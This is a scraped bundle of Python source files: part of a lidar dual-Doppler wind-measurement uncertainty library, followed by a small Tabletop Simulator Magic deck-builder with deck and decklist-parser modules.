measurements = self.measurements[measurements_id]
shear_exponent = atmosphere['model_parameters']['shear_exponent']
reference_height = atmosphere['model_parameters']['reference_height']
gain = (measurements['positions'][:,3] / reference_height)**shear_exponent
u = atmosphere['model_parameters']['eastward_wind'] * gain
v = atmosphere['model_parameters']['northward_wind'] * gain
w = np.full(gain.shape, atmosphere['model_parameters']['upward_air_velocity'])
wind_speed = atmosphere['model_parameters']['wind_speed'] * gain
wind_from_direction = np.full(gain.shape, atmosphere['model_parameters']['wind_from_direction'])
self.__create_wind_ds(atmosphere, measurements,
u, v, w, wind_speed, wind_from_direction)
class Instruments:
"""
A class containing basic methods to operate on instruments dictionary.
"""
__KWARGS = {'uncertainty_model',
'u_estimation',
'u_range',
'u_azimuth',
'u_elevation',
'u_radial',
'range_gain',
'azimuth_gain',
'elevation_gain',
'atmosphere_id',
'measurements_id',
'probing_coordinates',
'radial_velocity',
'coordinate_system',
'coordinates',
'category',
'linked_instruments' }
def __init__(self):
self.instruments = {}
self.verbos = True
@staticmethod
def check_instrument_position(instrument_position):
"""
Validates the position of instrument
Parameters
----------
instrument_position : ndarray
nD array containing data with `float` or `int` type
corresponding to x, y and z coordinates of a lidar.
nD array data are expressed in meters.
Returns
-------
True / False
"""
if(type(instrument_position).__module__ == np.__name__):
if (len(instrument_position.shape) == 1
and instrument_position.shape[0] == 3):
return True
else:
# print('Wrong dimensions! Must be == 3 !')
return False
else:
# print('Input is not numpy array!')
return False
def update_instrument(self, instrument_id, **kwargs):
"""
Updates a instrument instance in dictionary with information in kwargs.
Parameters
----------
instrument_id : str, required
String which identifies instrument in the instrument dictionary.
Other Parameters
-----------------
u_estimation : float, optional
Uncertainty in estimating radial velocity from Doppler spectra.
Unless provided, (default) value is set to 0.1 m/s.
u_range : float, optional
Uncertainty in detecting range at which atmosphere is probed.
Unless provided, (default) value is set to 1 meter.
u_azimuth : float, optional
Uncertainty in the beam steering for the azimuth angle.
Unless provided, (default) value is set to 0.1 degree.
u_elevation : float, optional
Uncertainty in the beam steering for the elevation angle.
Unless provided, (default) value is set to 0.1 degree.
Raises
------
WrongId
If for the provided instrument_id there is no key in the dictionary.
WrongKwargs
If one or more kwargs are incorrect.
Notes
-----
If end-user manually updates keys essential for uncertainty calculation
auto-update of the uncertainty values will not take place!
Therefore, to update uncertainty values end-user must re-execute
calculate_uncertainty method.
TODO
----
- If certain keys are changes/updated trigger the uncertainty re-calc.
"""
if instrument_id not in self.instruments:
raise ValueError("WrongId")
if (len(kwargs) > 0 and not(set(kwargs).issubset(self.__KWARGS))):
raise ValueError("WrongKwargs")
if (len(kwargs) > 0 and set(kwargs).issubset(self.__KWARGS)):
for key in kwargs:
if key in {'u_estimation', 'u_range', 'u_azimuth', 'u_elevation'}:
self.instruments[instrument_id]['intrinsic_uncertainty'][key] = kwargs[key]
class Lidars(Instruments):
"""
A class containing methods and attributes related to wind lidars.
Methods
-------
add_lidar(instrument_id, position, category, **kwargs):
Adds a lidar instance to the instrument dictionary.
"""
def __init__(self):
super().__init__()
def add_lidar(self, instrument_id, position, **kwargs):
"""
Adds a lidar instance to the instrument dictionary.
Parameters
----------
instrument_id : str, required
String which identifies instrument in the instrument dictionary.
position : ndarray, required
nD array containing data with `float` or `int` type corresponding
to Northing, Easting and Height coordinates of the instrument.
nD array data are expressed in meters.
Other Parameters
-----------------
u_estimation : float, optional
Uncertainty in estimating radial velocity from Doppler spectra.
Unless provided, (default) value is set to 0.1 m/s.
u_range : float, optional
Uncertainty in detecting range at which atmosphere is probed.
Unless provided, (default) value is set to 1 m.
u_azimuth : float, optional
Uncertainty in the beam steering for the azimuth angle.
Unless provided, (default) value is set to 0.1 deg.
u_elevation : float, optional
Uncertainty in the beam steering for the elevation angle.
Unless provided, (default) value is set to 0.1 deg.
Raises
------
InappropriatePosition
If the provided position of instrument is not properly provided.
Notes
--------
Instruments can be add one at time.
Currently only the instrument position in UTM coordinate system is supported.
TODO
----
- Support the instrument position in coordinate systems other than UTM
- Integrate e-WindLidar attributes and vocabulary for lidar type
"""
if not(self.check_instrument_position(position)):
raise ValueError("InappropriatePosition")
category="wind_lidar"
instrument_dict = {instrument_id:{
'category': category,
'position': position,
'intrinsic_uncertainty':{
'u_estimation' : 0.1, # default
'u_range' : 1, # default
'u_azimuth': 0.1, # default
'u_elevation': 0.1 # default
}
}
}
self.instruments.update(instrument_dict)
self.update_instrument(instrument_id, **kwargs)
if self.verbos:
print('Instrument \'' + instrument_id + '\' of category \'' +
category +'\' added to the instrument dictionary, ' +
'which now contains ' + str(len(self.instruments)) +
' instrument(s).')
class Uncertainty(Measurements, Lidars):
"""
A class containing methods to calculate single- and dual- Doppler uncertainty.
Methods
-------
add_atmosphere(atmosphere_id, model, model_parameters)
Adds description of the atmosphere to the atmosphere dictionary.
add_instrument(instrument_id, position, category, **kwargs):
Adds an instrument to the instrument dictionary.
add_measurements(measurements_id, category, **kwargs)
Adds desired measurement positions to the measurements dictionary.
calculate_uncertainty(instrument_ids, measurements_id, atmosphere_id, uncertainty_model)
Calculates a measurement uncertainty for a given instrument(s).
"""
def __init__(self):
self.uncertainty = None
Instruments.__init__(self)
Measurements.__init__(self)
self.probing_dict = {}
def _generate_prob_dict(self, instrument_id, measurements_id):
instrument_pos = self.instruments[instrument_id]['position']
measurement_pos = self.measurements[measurements_id]['positions']
coords = generate_beam_coords(instrument_pos,measurement_pos)
self.probing_dict.update({instrument_id:coords})
def __create_rad_ds(self, instrument_id, measurements):
"""
Creates radial wind speed uncertainty xarray object.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
measurements : dict
Dictionary containing information on measurements.
Returns
-------
ds : xarray
xarray dataset containing radial wind speed uncertainty.
Notes
----
Currently this method only supports points and horizontal mesh data structures.
The method can be called only when the radial uncertainty has been calculated.
"""
positions = measurements['positions']
category = measurements['category']
intrinsic_uncertainty = self.instruments[instrument_id]['intrinsic_uncertainty']
if category == 'points':
prob_cord = self.__probing_dict[instrument_id]
rad_speed = self.__radial_vel_dict[instrument_id]
azimuth_gain = self.__radial_uncertainty[instrument_id]['azimuth_gain']
elevation_gain = self.__radial_uncertainty[instrument_id]['elevation_gain']
range_gain = self.__radial_uncertainty[instrument_id]['range_gain']
u_radial = self.__radial_uncertainty[instrument_id]['u_radial']
ds = xr.Dataset({'azimuth':(['instrument_id','point'], np.array([prob_cord[:,0]])),
'elevation':(['instrument_id','point'], np.array([prob_cord[:,1]])),
'range':(['instrument_id','point'], np.array([prob_cord[:,2]])),
'radial_speed':(['instrument_id','point'], np.array([rad_speed])),
'azimuth_contribution':(['instrument_id','point'], np.array([azimuth_gain])),
'elevation_contribution':(['instrument_id','point'], np.array([elevation_gain])),
'range_contribution':(['instrument_id','point'], np.array([range_gain.T])),
'radial_speed_uncertainty':(['instrument_id','point'], np.array([u_radial])),
# 'instrument_uncertainty':(['instrument_id'], np.array([intrinsic_uncertainty]))
},
coords={'Easting':(['point'], positions[:,0]),
'Northing':(['point'], positions[:,1]),
'Height': (['point'], positions[:,2]),
'instrument_id': np.array([instrument_id])}
)
return ds
if category == 'horizontal_mesh':
nrows = measurements['nrows']
ncols = measurements['ncols']
prob_cord = self.__probing_dict[instrument_id].reshape(nrows, ncols,3)
rad_speed = self.__radial_vel_dict[instrument_id].reshape(nrows, ncols)
azimuth_gain = self.__radial_uncertainty[instrument_id]['azimuth_gain'].reshape(nrows, ncols)
elevation_gain = self.__radial_uncertainty[instrument_id]['elevation_gain'].reshape(nrows, ncols)
range_gain = self.__radial_uncertainty[instrument_id]['range_gain'].reshape(nrows, ncols)
u_radial = self.__radial_uncertainty[instrument_id]['u_radial'].reshape(nrows, ncols)
ds = xr.Dataset({'azimuth':(['instrument_id', 'Northing', 'Easting'],
np.array([prob_cord[:,:, 0].T])),
'elevation':(['instrument_id', 'Northing', 'Easting'],
np.array([prob_cord[:,:, 1].T])),
'range':(['instrument_id', 'Northing', 'Easting'],
np.array([prob_cord[:,:, 2].T])),
'radial_speed':(['instrument_id', 'Northing', 'Easting'],
np.array([rad_speed.T])),
'azimuth_contribution':(['instrument_id', 'Northing', 'Easting'],
np.array([azimuth_gain.T])),
'elevation_contribution':(['instrument_id', 'Northing', 'Easting'],
np.array([elevation_gain.T])),
'range_contribution':(['instrument_id', 'Northing', 'Easting'],
np.array([range_gain.T])),
'radial_speed_uncertainty':(['instrument_id', 'Northing', 'Easting'],
np.array([u_radial.T])),
'intrinsic_uncertainty':(['instrument_id'], np.array([intrinsic_uncertainty]))
},
coords={'Easting': np.unique(positions[:,0]),
'Northing': np.unique(positions[:,1]),
'instrument_id': np.array([instrument_id]),
'Height': positions[0,2]}
)
return ds
def __create_dd_ds(self, measurements):
"""
Creates dual-Doppler uncertainty xarray object.
Parameters
----------
measurements : dict
Dictionary containing information on measurements.
Returns
-------
ds : xarray
xarray dataset containing dual-Doppler uncertainty.
Notes
----
Currently this method only supports points and horizontal mesh data structures.
The method can be called only when the dual-Doppler uncertainty has been calculated.
"""
positions = measurements['positions']
category = measurements['category']
if category == 'points':
ds = xr.Dataset({'wind_speed_uncertainty':(['point'],
self.__wind_speed_uncertainty),
'wind_from_direction_uncertainty':(['point'],
self.__wind_from_direction_uncertainty),
'between_beam_angle':(['point'], self.__between_beam_angle),
'numerator_of_wind_speed_uncertainty':(['point'], self.__numerator_Vh),
'numerator_of_wind_from_direction_uncertainty':(['point'], self.__numerator_dir),
'denominator_of_wind_speed_uncertainty':(['point'], self.__denominator_Vh),
'denominator_of_wind_from_direction_uncertainty':(['point'], self.__denominator_dir),
},
coords={'Easting':(['point'], positions[:,0]),
'Northing':(['point'], positions[:,1]),
'Height': (['point'], positions[:,2])}
)
if category == 'horizontal_mesh':
ds = xr.Dataset({'wind_speed_uncertainty':(['Northing', 'Easting'], self.__wind_speed_uncertainty),
'wind_from_direction_uncertainty':(['Northing', 'Easting'], self.__wind_from_direction_uncertainty),
'between_beam_angle':(['Northing', 'Easting'], self.__between_beam_angle),
'numerator_of_wind_speed_uncertainty':(['Northing', 'Easting'], self.__numerator_Vh),
'numerator_of_wind_from_direction_uncertainty':(['Northing', 'Easting'], self.__numerator_dir),
'denominator_of_wind_speed_uncertainty':(['Northing', 'Easting'], self.__denominator_Vh),
'denominator_of_wind_from_direction_uncertainty':(['Northing', 'Easting'], self.__denominator_dir),
},
coords={'Easting': np.unique(positions[:,0]),
'Northing': np.unique(positions[:,1]),
'Height': positions[0,2]})
return ds
@staticmethod
def __update_metadata(ds, uncertainty_model):
"""
Updates xarray dataset with metadata.
Parameters
----------
ds : xarray
xarray dataset containing radial and/or dual-Doppler uncertainty.
uncertainty_model : str
String indicating which uncertainty model was used for the uncertainty calculation.
Returns
-------
ds : xarray
xarray dataset updated with metadata.
"""
# Update of metadata here
ds.attrs['title'] = 'Radial speed uncertainty'
ds.attrs['convention'] = 'cf'
ds.attrs['uncertainty_model'] = 'Vasiljevic-Courtney_' + uncertainty_model
ds.azimuth.attrs['units'] = 'degree'
ds.elevation.attrs['units'] = 'degree'
ds.range.attrs['units'] = 'm'
ds.radial_speed.attrs['units'] = 'm s-1'
ds.radial_speed.attrs['standard_name'] = 'radial_velocity_of_scatterers_toward_instrument'
ds.radial_speed_uncertainty.attrs['units'] = 'm s-1'
ds.azimuth_contribution.attrs['units'] = 'm s-1'
ds.elevation_contribution.attrs['units'] = 'm s-1'
ds.range_contribution.attrs['units'] = 'm s-1'
ds.Easting.attrs['units'] = 'm'
ds.Northing.attrs['units'] = 'm'
ds.Height.attrs['units'] = 'm'
if uncertainty_model == 'dual-Doppler':
ds.attrs['title'] = 'Dual-Doppler uncertainty'
ds.attrs['uncertainty_model'] = 'Vasiljevic-Courtney_' + uncertainty_model
ds.wind_from_direction_uncertainty.attrs['units'] = 'degree'
ds.wind_speed_uncertainty.attrs['units'] = 'm s-1'
return ds
def __calculate_elevation_contribution(self, instrument_id):
"""
Calculates the elevation angle uncertainty contribution to the radial uncertainty.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
Returns
-------
elevation_contribution : ndarray
nD array of elevation angle uncertainty contribution for each measurement point.
"""
# Necessary parameters extraction:
#
u_elevation = self.instruments[instrument_id]['intrinsic_uncertainty']['u_elevation']
coords = self.__probing_dict[instrument_id]
wind_from_direction = self.wind_field.wind_from_direction.values.reshape(-1)
shear_exponent = self.wind_field.attrs['atmospheric_model_parameters']['shear_exponent']
wind_speed = self.wind_field.attrs['atmospheric_model_parameters']['wind_speed']
reference_height = self.wind_field.attrs['atmospheric_model_parameters']['reference_height']
measurement_height = self.wind_field.Height_agl.values
elevation_contribution = (- shear_exponent * coords[:,2] *
np.cos(np.radians(coords[:,0] - wind_from_direction)) *
np.cos(np.radians(coords[:,1]))**2 *
(measurement_height / reference_height)**(shear_exponent-1) *
(wind_speed / reference_height) +
np.cos(np.radians(coords[:,0] - wind_from_direction)) *
np.sin(np.radians(coords[:,1])) *
wind_speed*(measurement_height / reference_height)**(shear_exponent)
) * u_elevation * (pi/180)
return elevation_contribution
def __calculate_azimuth_contribution(self, instrument_id):
"""
Calculates the azimuth angle uncertainty contribution to the radial uncertainty.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
Returns
-------
azimuth_contribution : ndarray
nD array of azimuth angle uncertainty contribution for each measurement point.
"""
# Necessary parameters extraction:
#
u_azimuth = self.instruments[instrument_id]['intrinsic_uncertainty']['u_azimuth']
coords = self.__probing_dict[instrument_id]
wind_from_direction = self.wind_field.wind_from_direction.values.reshape(-1)
shear_exponent = self.wind_field.attrs['atmospheric_model_parameters']['shear_exponent']
wind_speed = self.wind_field.attrs['atmospheric_model_parameters']['wind_speed']
reference_height = self.wind_field.attrs['atmospheric_model_parameters']['reference_height']
measurement_height = self.wind_field.Height_agl.values
azimuth_contribution = - (np.sin(np.radians(coords[:,0] - wind_from_direction)) *
np.cos(np.radians(coords[:,1])) *
wind_speed*(measurement_height / reference_height)**(shear_exponent)) * u_azimuth * (pi/180)
return azimuth_contribution
def __calculate_range_contribution(self, instrument_id):
"""
Calculates the range uncertainty contribution to the radial uncertainty.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
Returns
-------
range_contribution : ndarray
nD array of range uncertainty contribution for each measurement point.
"""
# Necessary parameters extraction:
#
u_range = self.instruments[instrument_id]['intrinsic_uncertainty']['u_range']
coords = self.__probing_dict[instrument_id]
wind_from_direction = self.wind_field.wind_from_direction.values.reshape(-1)
shear_exponent = self.wind_field.attrs['atmospheric_model_parameters']['shear_exponent']
wind_speed = self.wind_field.attrs['atmospheric_model_parameters']['wind_speed']
reference_height = self.wind_field.attrs['atmospheric_model_parameters']['reference_height']
measurement_height = self.wind_field.Height_agl.values
range_contribution = (
(shear_exponent/reference_height) *
np.cos(np.radians(coords[:,0] - wind_from_direction)) *
np.cos(np.radians(coords[:,1])) *
np.sin(np.radians(coords[:,1])) *
wind_speed*(measurement_height / reference_height)**(-1 + shear_exponent)
)*u_range
return range_contribution
def __calculate_radial_uncertainty(self, instrument_id):
"""
Calculates the radial wind speed uncertainty.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
Returns
-------
dict_out : dict
Dictionary containing selected uncertainty model, calculated radial
uncertainty and gains for each individual uncertainty component.
Notes
--------
The radial wind speed uncertainty, :math:`{u_{V_{radial}}}`, is calculated
using the following mathematical expression:
.. math::
u_{V_{radial}}^2 = u_{estimation}^2 +
(elevation_contribution)^2 +
(azimuth_contribution)^2 +
(range_contribution)^2
"""
u_estimation = self.instruments[instrument_id]['intrinsic_uncertainty']['u_estimation']
azimuth_contrib = self.__calculate_azimuth_contribution(instrument_id)
elevation_contrib = self.__calculate_elevation_contribution(instrument_id)
range_contrib = self.__calculate_range_contribution(instrument_id)
abs_uncertainty = np.sqrt(
(u_estimation)**2 +
(azimuth_contrib)**2 +
(elevation_contrib)**2 +
(range_contrib)**2
)
dict_out = {'azimuth_gain' : azimuth_contrib,
'elevation_gain' : elevation_contrib,
'range_gain': range_contrib,
'u_radial' : abs_uncertainty,
'uncertainty_model' : 'radial_velocity'
}
return dict_out
def __calculate_DD_speed_uncertainty(self, instrument_ids):
"""
Calculates the dual-Doppler wind speed uncertainty.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
Notes
--------
The dual-Doppler wind speed uncertainty, :math:`{u_{V_{h}}}`, is calculated
using the following mathematical expression:
.. math::
u_{V_{h}}=\\frac{1}{V_{h} \sin({\\theta}_{1}-{\\theta}_{2})^2} *
\\biggl((V_{radial_{1}}-V_{radial_{2}}\cos({\\theta}_{1}-{\\theta}_{2}))^{2}u_{V_{radial_{1}}}^{2} +
(V_{radial_{2}}-V_{radial_{1}}\cos({\\theta}_{1}-{\\theta}_{2}))^{2}u_{V_{radial_{2}}}^{2}\\biggl)^{\\frac{1}{2}}
where :math:`u_{V_{radial_{1}}}` and :math:`u_{V_{radial_{2}}}` are radial
uncertainties for measurements of radial velocities :math:`{V_{radial_{1}}}`
and :math:`{V_{radial_{2}}}` by a dual-Doppler system (e.g., two lidars),
:math:`{\\theta_{1}}` and :math:`{\\theta_{2}}` are the azimuth angles
of the two intersecting beams at a point of interest, while :math:`{V_{h}}`
is the horizontal wind speed at that point.
"""
azimuth_1 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[0]).values
azimuth_2 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[1]).values
angle_dif = np.radians(azimuth_1 - azimuth_2) # in radians
los_1 = self.uncertainty.radial_speed.sel(instrument_id=instrument_ids[0]).values
U_rad1 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[0]).values
los_2 = self.uncertainty.radial_speed.sel(instrument_id =instrument_ids[1]).values
U_rad2 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[1]).values
wind_speed = self.wind_field.wind_speed.values
# uncertainty =((wind_speed * (np.sin(angle_dif))**2)**-1 *
# np.sqrt((los_1 - los_2 * np.cos(angle_dif))**2 * U_rad1**2 +
# (los_2 - los_1 * np.cos(angle_dif))**2 * U_rad2**2))
numerator = np.sqrt(((los_1 - los_2*np.cos(angle_dif))**2)*U_rad1**2+
((los_2 - los_1*np.cos(angle_dif))**2)*U_rad2**2)
denominator = wind_speed * (np.sin(angle_dif))**2
uncertainty = numerator / denominator
self.__numerator_Vh = numerator
self.__denominator_Vh = denominator
self.__wind_speed_uncertainty = uncertainty
self.__between_beam_angle = np.degrees(np.arcsin(np.abs(np.sin(angle_dif))))
def __calculate_DD_direction_uncertainty(self, instrument_ids):
"""
Calculates the dual-Doppler wind direction uncertainty.
Parameters
----------
instrument_id : str
String indicating the instrument in the dictionary to be considered.
Returns
-------
uncertainty : ndarray
nD array of calculated dual-Doppler wind speed uncertainty.
Notes
--------
The dual-Doppler wind speed uncertainty, :math:`{u_{\Theta}}`, is calculated
using the following mathematical expression:
.. math::
u_{\Theta}=\\biggl(\\frac{u_{V_{radial_{1}}}^{2}V_{radial_{2}}^{2}+u_{V_{radial_{2}}}^{2}V_{radial_{1}}^{2}}{V_{h}^{4}\sin ({\\theta}_{1}-{\\theta}_{2})^{2}}\\biggl)^{\\frac{1}{2}}
where :math:`u_{V_{radial_{1}}}` and :math:`u_{V_{radial_{2}}}` are radial
uncertainties for measurements of radial velocities :math:`{V_{radial_{1}}}`
and :math:`{V_{radial_{2}}}` by a dual-Doppler system (e.g., two lidars),
:math:`{\\theta_{1}}` and :math:`{\\theta_{2}}` are the azimuth angles
of the two intersecting beams at a point of interest, while :math:`{V_{h}}`
is the horizontal wind speed at that point.
"""
azimuth_1 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[0]).values
azimuth_2 = self.uncertainty.azimuth.sel(instrument_id =instrument_ids[1]).values
angle_dif = np.radians(azimuth_1 - azimuth_2) # in radians
los_1 = self.uncertainty.radial_speed.sel(instrument_id =instrument_ids[0]).values
U_rad1 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[0]).values
los_2 = self.uncertainty.radial_speed.sel(instrument_id =instrument_ids[1]).values
U_rad2 = self.uncertainty.radial_speed_uncertainty.sel(instrument_id =instrument_ids[1]).values
wind_speed = self.wind_field.wind_speed.values
numerator = np.sqrt((los_1*U_rad2)**2 + (los_2*U_rad1)**2)
denominator = np.abs(np.sin(angle_dif)) * wind_speed**2
uncertainty = (numerator / denominator)*(180/pi)
self.__wind_from_direction_uncertainty = uncertainty
self.__numerator_dir = numerator
self.__denominator_dir = denominator
def calculate_uncertainty(self, instrument_ids,
measurements_id,
atmosphere_id,
uncertainty_model = 'radial_uncertainty'):
"""
Calculates a measurement uncertainty for a given instrument(s).
Parameters
----------
instrument_ids : list, required
List of strings which identifies instruments the dictionary.
measurements_id : str, required
String corresponding to the key in measurements dictionary.
atmosphere_id : str, required
String corresponding to the key in atmosphere dictionary.
uncertainty_model : str, optional
String defining uncertainty model used for uncertainty calculations.
default value set to 'radial_uncertainty'
Notes
-----
Currently, this method calculates radial and dual-Doppler
uncertainty for single (radial uncertainty) or a pair of instruments
(radial + dual-Doppler uncertainty).
The radial wind speed uncertainty, :math:`{u_{V_{radial}}}`, is calculated
using the following mathematical expression:
.. math::
u_{V_{radial}}^2 = u_{estimation}^2 +
(elevation_contribution)^2 +
(azimuth_contribution)^2 +
(range_contribution)^2
The dual-Doppler wind speed uncertainty, :math:`{u_{V_{h}}}`, is calculated
using the following mathematical expression:
.. math::
u_{V_{h}}=\\frac{1}{V_{h} \sin({\\theta}_{1}-{\\theta}_{2})^2} *
\\biggl((V_{radial_{1}}-V_{radial_{2}}\cos({\\theta}_{1}-{\\theta}_{2}))^{2}u_{V_{radial_{1}}}^{2} +
(V_{radial_{2}}-V_{radial_{1}}\cos({\\theta}_{1}-{\\theta}_{2}))^{2}u_{V_{radial_{2}}}^{2}\\biggl)^{\\frac{1}{2}}
where :math:`u_{V_{radial_{1}}}` and :math:`u_{V_{radial_{2}}}` are radial
uncertainties for measurements of radial velocities :math:`{V_{radial_{1}}}`
and :math:`{V_{radial_{2}}}` by a dual-Doppler system (e.g., two lidars),
:math:`{\\theta_{1}}` and :math:`{\\theta_{2}}` are the azimuth angles
of the two intersecting beams at a point of interest, while :math:`{V_{h}}`
is the horizontal wind speed at that point.
The dual-Doppler wind speed uncertainty, :math:`{u_{\Theta}}`, is calculated
using the following mathematical expression:
.. math::
u_{\Theta}=\\biggl(\\frac{u_{V_{radial_{1}}}^{2}V_{radial_{2}}^{2}+u_{V_{radial_{2}}}^{2}V_{radial_{1}}^{2}}{V_{h}^{4}\sin ({\\theta}_{1}-{\\theta}_{2})^{2}}\\biggl)^{\\frac{1}{2}}
where :math:`u_{V_{radial_{1}}}` and :math:`u_{V_{radial_{2}}}` are radial
uncertainties for measurements of radial velocities :math:`{V_{radial_{1}}}`
and :math:`{V_{radial_{2}}}` by a dual-Doppler system (e.g., two lidars),
:math:`{\\theta_{1}}` and :math:`{\\theta_{2}}` are the azimuth angles
of the two intersecting beams at a point of interest, while :math:`{V_{h}}`
is the horizontal wind speed at that point.
"""
# Check if lidar_ids are correct if not exit
if not(isinstance(instrument_ids, list)):
raise ValueError('Instrument ids not provided as a list of strings!')
if not(all(isinstance(id, str) for id in instrument_ids)):
raise ValueError('One or more items in instrument id list not strings!')
if not(set(instrument_ids).issubset(set(self.instruments))):
raise ValueError('One or more ids don\'t exist in the instrument dictionary!')
# Check if measurements_id is correct if not exit
if not(isinstance(measurements_id, str)):
raise ValueError('measurements_id is not a string!')
if measurements_id not in set(self.measurements):
raise ValueError('Measurements id does not exist in the measurement dictionary!')
if len(self.measurements[measurements_id]['positions']) == 0:
raise ValueError('Measurements dictionary empty for the given id!')
# Check if atmosphere_id is correct if not exit
if not(isinstance(atmosphere_id, str)):
raise ValueError('atmosphere_id is not a string!')
if atmosphere_id not in set(self.atmosphere):
raise ValueError('atmosphere_id does not exist in self.atmosphere!')
# Calculate wind field
atmosphere = self.atmosphere[atmosphere_id]
measurements = self.measurements[measurements_id]
self.calculate_wind(measurements_id, atmosphere_id)
# Calculate probing angles
self.__probing_dict = {}
for id in instrument_ids:
coords = generate_beam_coords(self.instruments[id]['position'],
measurements['positions'])
self.__probing_dict.update({id:coords})
# Calculate radial velocities for each lidar
self.__radial_vel_dict = {}
for id in instrument_ids:
los = wind_vector_to_los(self.wind_field.eastward_wind.values.reshape(-1),
self.wind_field.northward_wind.values.reshape(-1),
self.wind_field.upward_air_velocity.values.reshape(-1),
self.__probing_dict[id][:,0],
self.__probing_dict[id][:,1])
self.__radial_vel_dict.update({id:los})
self.radial_vel_dict = self.__radial_vel_dict
self.probing_dict = self.__probing_dict
# Calculate radial velocity uncertainty for each lidar
self.__radial_uncertainty = {}
for id in instrument_ids:
self.__radial_uncertainty.update({id: self.__calculate_radial_uncertainty(id)})
# Make radial uncertainty xarray object
for i,id in enumerate(instrument_ids):
ds_temp = self.__create_rad_ds(id, measurements)
if i == 0:
self.uncertainty = ds_temp
else:
self.uncertainty = xr.merge([self.uncertainty, ds_temp])
self.uncertainty = self.__update_metadata(self.uncertainty, 'radial_uncertainty')
if uncertainty_model == 'dual-Doppler':
if len(instrument_ids) != 2:
raise ValueError('instrument_ids must contain exactly two ids!')
self.__calculate_DD_speed_uncertainty(instrument_ids)
self.__calculate_DD_direction_uncertainty(instrument_ids)
# self.__wind_speed_uncertainty = self.__calculate_DD_speed_uncertainty(instrument_ids)
# self.__wind_from_direction_uncertainty = self.__calculate_DD_direction_uncertainty(instrument_ids)
ds_temp = self.__create_dd_ds(measurements)
self.uncertainty = xr.merge([self.uncertainty, ds_temp])
self.uncertainty = self.__update_metadata(self.uncertainty, 'dual-Doppler')
| {"/yaddum/__init__.py": ["/yaddum/yaddum.py"], "/test/test.py": ["/yaddum/__init__.py"]} |
50,051 | JarLoz/flipper2 | refs/heads/master | /fliplib/deck.py | from .scryfall import getApi
from .printer import printMessage
from .card import createCard
class Deck:
def __init__(self, name):
self.mainboard = []
self.sideboard = []
self.extra = []
self.api = getApi()
self.name = name
self.nextCardId = 100
def addCardToMainboard(self, amount, cardname):
card = createCard(cardname, self.nextCardId)
self.mainboard.append((amount, card))
self.nextCardId += 1
# This was to shuffle things around with the images? Skips from 169 to 200 and so on.
if int(str(self.nextCardId)[1:]) == 69:
self.nextCardId += 31
def printDecklist(self):
"""
Spits the out the decklist information for debugging
"""
for cardEntry in self.mainboard:
amount = cardEntry[0]
card = cardEntry[1]
printMessage(str(amount) + ' ' + card.name())
def generateTTSDeckObject(self):
"""
Generates the JSON deck object that TTS uses.
"""
ttsDeckObject = {'Transform': {'posX':1.0,'posY':1.0,'posZ':-0.0,'rotX':0,'rotY':180,'rotZ':180,'scaleX':1,'scaleY':1,'scaleZ':1}}
ttsDeckObject['Name'] = 'DeckCustom'
ttsDeckObject['Nickname'] = self.name
containedObjects = []
deckIds = []
for cardTuple in self.mainboard:
amount = cardTuple[0]
card = cardTuple[1]
cardObject = card.getTTSCardObject()
# TODO Figure out how to put several copies of similar card into the deck, maybe this is wrong?
containedObjects.append(cardObject)
for _ in range(amount):
deckIds.append(cardObject.cardId)
ttsDeckObject['ContainedObjects'] = containedObjects
ttsDeckObject['DeckIds'] = deckIds
customDeck = {}
for deckImage in getDeckImages():
customDeck[deckImage.index] = deckImage.getCustomDeckObject()
ttsDeckObject['CustomDeck'] = customDeck
return ttsDeckObject
def getDeckImages(self):
imageIndex = 0
deckImageNames = []
for i in range(0,len(self.mainboard),69) :
chunk = self.mainboard[i:i+69]
imageNames = list(map(lambda cardTuple: cardTuple[1].imageName(), chunk))
# TODO Create DeckImages here.
deckImageName = deckName+'_image_'+str(imageIndex)+".jpg"
deckImageNames.append(deckImageName)
callMontage(imageNames, deckImageName, hires, output)
imageIndex += 1
return deckImageNames
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,052 | JarLoz/flipper2 | refs/heads/master | /flipper2.py | from fliplib.parser import readDecklist
import os
def initializeCaches():
os.makedirs('imageCache', exist_ok=True)
os.makedirs('apiCache', exist_ok=True)
initializeCaches()
deck = readDecklist("decklist.txt")
deck.printDecklist()
| {"/fliplib/deck.py": ["/fliplib/scryfall.py", "/fliplib/card.py"], "/flipper2.py": ["/fliplib/parser.py"], "/fliplib/parser.py": ["/fliplib/deck.py", "/fliplib/scryfall.py"], "/fliplib/card.py": ["/fliplib/scryfall.py"]} |
50,053 | JarLoz/flipper2 | refs/heads/master | /fliplib/parser.py | import re
from .deck import Deck
from .scryfall import ApiError
from .printer import printMessage
def readDecklist(filename):
"""
Reads a decklist from a file
"""
try:
with open(filename,encoding="utf8") as decklistfile:
decklist = decklistfile.readlines()
return parseDecklist(decklist)
except FileNotFoundError:
printMessage("File not found!")
return None
def parseDecklist(decklist):
"""
Parses a given decklist (list of lines) into a Deck object containing Card objects.
"""
newDeck = Deck()
for line in decklist:
amount, cardname = parseDecklistLine(line)
if (cardname):
try:
newDeck.addCardToMainboard(amount, cardname)
except ApiError as exception:
printMessage(exception.message)
return newDeck
def parseDecklistLine(line):
"""
Parses the relevant information from a decklist line.
"""
splitLine = line.split()
if (len(splitLine) < 1):
return (None, None)
if (re.match('\d+$',splitLine[0])):
# A digit means a count. I hope.
amount = int(splitLine[0])
cardname = ' '.join(splitLine[1:])
else:
# No digit, assuming count of one.
amount = 1
cardname = line
return (amount, cardname)
